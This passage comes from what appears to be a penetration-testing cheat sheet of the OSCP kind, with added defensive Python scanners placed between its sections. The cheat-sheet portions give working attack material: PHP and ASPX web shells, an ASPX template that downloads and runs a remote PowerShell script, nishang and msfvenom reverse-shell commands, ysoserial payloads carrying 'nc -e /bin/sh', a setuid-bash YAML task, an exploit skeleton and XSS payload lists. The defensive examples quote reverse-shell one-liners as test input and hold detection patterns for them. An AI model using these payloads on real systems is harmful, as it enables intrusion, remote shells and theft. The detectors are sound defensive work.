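        r"(?:\bsocket\(|fsockopen\(|TCPSocket\.open\().*\bexec\s*\(?\s*(?:sprintf\()?\"/bin/(?:ba)?sh -i"),
}

# Constructed sample input (placeholder addresses, not real traffic).
SAMPLE_LINES = [
    '10.0.0.7 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 12 "-" "curl/7.88.1" "() { :;}; /bin/bash -i >& /dev/tcp/10.0.0.9/4444 0>&1"',
    '10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    "bash -c 'bash -i >& /dev/tcp/10.0.0.9/4444 0>&1'",
    "nc -e /bin/sh 10.0.0.9 4444",
    "nc -zv 10.0.0.9 22",
    "mkfifo /tmp/shell; nc 10.0.0.9 4444 0</tmp/shell | /bin/sh >/tmp/shell 2>&1; rm /tmp/shell",
    "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.0.0.9\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
    "php -r '$sock=fsockopen(\"10.0.0.9\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",
    "ls -la /var/www/html",
]


def detect(line):
    """Return the sorted indicator names that match one line (empty if clean)."""
    return sorted(name for name, pat in INDICATORS.items() if pat.search(line))


def scan(lines):
    """Map 1-based line number -> matched indicators, for lines that hit."""
    return {i: hits for i, line in enumerate(lines, 1) if (hits := detect(line))}


if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LINES).items():
        print(f"line {number}: {', '.join(hits)}")
```

Line 1 hits two indicators at once (the Shellshock header carries the bash reverse shell as its payload), the port check on line 5 and the directory listing on line 9 stay clean, and the `-e` test in `netcat-exec` is deliberately scoped to the same command (no `|`, `;` or `&` in between) so a later pipeline element cannot cause a false match.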
Web Shells
PHP Web Shell
<?php system($_GET['cmd']); ?>
<?php echo exec($_POST['cmd']); ?>
<?php echo passthru($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>
<?php echo system($_REQUEST['shell']); ?>
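Every one-liner above has the same shape: a request superglobal passed straight into a command-execution function. A triage scanner for that shape, as an added example that is not part of the cheat sheet (the scan_php() helper and the sample snippets are my own construction): it flags a superglobal used directly as a sink argument, with or without a wrapper such as base64_decode(), and also a variable assigned from a superglobal and later passed to a sink. A regex pass is a triage aid, not a parser; obfuscated shells need real taint analysis.

```python
"""Flag PHP source that hands request input to a command-execution sink.

Added defensive example (not part of the cheat sheet); the sample snippets
and scan_php() are my own construction.
"""
import re

SINKS = ("system", "exec", "passthru", "shell_exec", "popen", "proc_open", "eval", "assert")
SOURCES = r"\$_(?:GET|POST|REQUEST|COOKIE)"
SINK_RE = "|".join(map(re.escape, SINKS))

# sink( [wrapper(] $_GET[...]  -- wrappers such as base64_decode(...) are allowed in between
DIRECT_RE = re.compile(rf"\b({SINK_RE})\s*\((?:\s*\w+\s*\()*\s*({SOURCES})\b", re.I)
# $var = $_POST[...]
ASSIGN_RE = re.compile(rf"\$(\w+)\s*=\s*({SOURCES})\b", re.I)


def scan_php(src):
    """Return a list of (kind, sink, source) findings for one PHP source string."""
    findings = []
    for m in DIRECT_RE.finditer(src):
        findings.append(("direct", m.group(1).lower(), m.group(2)))
    for var, source in ASSIGN_RE.findall(src):
        # does the tainted variable later reach a sink?
        tainted_use = re.compile(
            rf"\b({SINK_RE})\s*\((?:\s*\w+\s*\()*\s*\${re.escape(var)}\b", re.I)
        for use in tainted_use.finditer(src):
            findings.append(("indirect", use.group(1).lower(), source))
    return findings


# Constructed samples: the one-liners listed above, plus benign and indirect code.
SAMPLES = {
    "shell1": "<?php system($_GET['cmd']); ?>",
    "shell2": "<?php echo exec($_POST['cmd']); ?>",
    "shell3": "<?php passthru($_REQUEST['cmd']); ?>",
    "indirect": "<?php $c = $_POST['c']; if ($c) { echo shell_exec($c); } ?>",
    "wrapped": "<?php eval(base64_decode($_COOKIE['k'])); ?>",
    "benign": "<?php echo htmlspecialchars($_GET['name'], ENT_QUOTES); system('date'); ?>",
}


def triage(samples):
    """Name -> findings, for the samples that produced any."""
    return {name: scan_php(src) for name, src in samples.items() if scan_php(src)}


if __name__ == "__main__":
    for name, findings in triage(SAMPLES).items():
        print(name, findings)
```

The benign sample shows the two things the scanner must not confuse: request input that goes to an encoder rather than a sink, and a sink called with a constant. Run it over a document root and review the hits; a file that is nothing but one sink call on request input has no legitimate reason to exist.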
nishang
cd path/to/nishang/Shells/
cp Invoke-PowerShellTcp.ps1 Invoke-PowerShellTcp.ps1
tail -3 Invoke-PowerShellTcp.ps1
}
Invoke-PowerShellTcp -Reverse -IPAddress <LHOST> -Port <LPORT>
powershell "IEX(New-Object Net.Webclient).downloadString('http://<LHOST>:<LPORT>/Invoke-PowerShellTcp.ps1')"
Shikata Ga Nai
msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/shell.exe
ysoserial
java -jar ysoserial-master-SNAPSHOT.jar
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections1 'nc <LHOST> <LPORT> -e /bin/sh' | base64 -w 0
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections4 "$jex" > /tmp/$filename.session
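Whatever gadget chain ysoserial produces, the output is a Java serialization stream, and every such stream starts with the magic bytes AC ED 00 05 (base64: the prefix "rO0AB"). A request-parameter check that recognises the stream before anything deserializes it, as an added example that is not part of the cheat sheet or of ysoserial (the sample parameters and helper names are my own construction):

```python
"""Spot Java serialized objects (what ysoserial emits) in request parameters.

Added defensive example; not part of the cheat sheet or of ysoserial. The
sample parameters and the helper names are my own construction.
"""
import base64
import binascii

JAVA_STREAM_MAGIC = b"\xac\xed\x00\x05"
JAVA_STREAM_MAGIC_B64 = "rO0AB"   # base64.b64encode(JAVA_STREAM_MAGIC) == b"rO0ABQ=="


def _try_b64decode(text):
    """Decode standard or URL-safe base64, tolerating missing padding; None on failure."""
    text = text.strip()
    text += "=" * (-len(text) % 4)
    for decoder in (base64.b64decode, base64.urlsafe_b64decode):
        try:
            return decoder(text)
        except (binascii.Error, ValueError):
            continue
    return None


def looks_like_java_serialized(value):
    """True if value (raw bytes, or a str that may be base64) is a Java serialization stream."""
    if isinstance(value, (bytes, bytearray)):
        return bytes(value).startswith(JAVA_STREAM_MAGIC)
    if value.lstrip().startswith(JAVA_STREAM_MAGIC_B64):
        return True                      # cheap path: the base64 prefix is fixed
    decoded = _try_b64decode(value)
    return decoded is not None and decoded.startswith(JAVA_STREAM_MAGIC)


def flag_parameters(params):
    """Return the names of request parameters carrying a Java serialized object."""
    return [name for name, value in params.items() if looks_like_java_serialized(value)]


# Constructed sample: the magic header followed by a fake class descriptor
# (TC_OBJECT 0x73, TC_CLASSDESC 0x72, then a made-up 11-byte class name).
SAMPLE_STREAM = JAVA_STREAM_MAGIC + b"\x73\x72\x00\x0bExampleOnly"
SAMPLE_PARAMS = {
    "javax.faces.ViewState": base64.b64encode(SAMPLE_STREAM).decode(),
    "q": "search term",
    "token": base64.b64encode(b"just-a-session-token").decode(),
}


if __name__ == "__main__":
    print("serialized parameters:", flag_parameters(SAMPLE_PARAMS))
```

The check is deliberately content-agnostic: it does not need to know which library the gadget chain abuses, which is what makes it cheap to keep in a WAF rule or request filter. The real fix is on the application side (an ObjectInputStream filter or no native deserialization of untrusted input at all); this check is the compensating control while that is done.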
Templates
ASPX Web Shell
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://<LHOST>/shellyjelly.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->
Bad YAML
- hosts: localhost
  tasks:
    - name: badyml
      command: chmod +s /bin/bash
Exploit Skeleton Python Script
#!/usr/bin/python
import socket,sys

address = '127.0.0.1'
port = 9999
buffer = #TBD

try:
    print '[+] Sending buffer'
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((address,port))
    s.recv(1024)
    s.send(buffer + '\r\n')
except:
    print '[!] Unable to connect to the application.'
    sys.exit(0)
finally:
    s.close()
JSON POST Request
POST /<path> HTTP/1.1
Host: <RHOST>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Content-Length: 95
Connection: close

{
  "auth":{
    "name":"<USERNAME>",
    "password":"<PASSWORD>"
  },
  "filename":"<FILE>"
}
XSS
Basic Payloads
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script src="http://<LHOST>/<FILE>"></script>
IMG Payloads
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
SVG Payloads
<svg onload=alert(1)>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<svg><script href=data:,alert(1) /> (Firefox is the only browser which allows a self-closing script tag)
DIV Payloads
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>
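Several of the payloads above (`<scr<script>ipt>`, `oneonerrorrror`) exist specifically to defeat filters that delete a blacklisted token once. The defender's counterpart to this list, as an added example that is not part of the cheat sheet: a deliberately naive blacklist filter (my construction) beside contextual output encoding, run over the payloads from this section, showing that the blacklist reassembles the very token it removed while encoding leaves no markup behind. html.escape() is correct for text in an HTML body or a quoted attribute only; values placed inside JavaScript, CSS or a URL need the encoder for that context.

```python
"""Why output encoding, not token stripping, neutralises the payloads above.

Added defensive example, not part of the cheat sheet. PAYLOADS repeats a
subset of the list from this section; strip_blacklist() is a deliberately
naive filter (my construction) and encode_for_html() is the contextual
encoding for text placed in an HTML body or a quoted attribute.
"""
import html
import re

PAYLOADS = [
    "<script>alert('XSS')</script>",
    "<scr<script>ipt>alert('XSS')</scr<script>ipt>",
    "\"><script>alert(String.fromCharCode(88,83,83))</script>",
    "<img src=x onerror=alert('XSS');>",
    "<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>",
    "<svg/onload=alert('XSS')>",
    "<div onpointerover=\"alert(45)\">MOVE HERE</div>",
]

# The naive filter: delete <script>, </script> and onerror wherever they occur.
BLACKLIST_RE = re.compile(r"(?i)</?script>|onerror")


def strip_blacklist(s):
    """Single-pass blacklist removal; the nested payloads are built to survive it."""
    return BLACKLIST_RE.sub("", s)


def encode_for_html(s):
    """Escape &, <, >, double and single quotes so the browser renders text, not markup."""
    return html.escape(s, quote=True)


def leaves_markup(s):
    """Crude check: is any unescaped angle bracket or quote left in the output?"""
    return any(ch in s for ch in "<>\"'")


def compare(payloads):
    """For each payload: (payload, blacklist leaves markup?, encoding leaves markup?)."""
    return [(p, leaves_markup(strip_blacklist(p)), leaves_markup(encode_for_html(p)))
            for p in payloads]


if __name__ == "__main__":
    for payload, after_blacklist, after_encoding in compare(PAYLOADS):
        print(f"blacklist={after_blacklist!s:5} encoding={after_encoding!s:5}  {payload}")
```

The two nested payloads are the instructive cases: removing the inner `<script>` from `<scr<script>ipt>` yields `<script>`, and removing `onerror` from `oneonerrorrror` yields `onerror`, so the filter hands the browser exactly the token it was meant to block. Encoding does not try to recognise bad input at all; it changes the characters that give input structural meaning, which is why it holds for the whole list.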
The OSCP Guide is a github repository by 0xsry0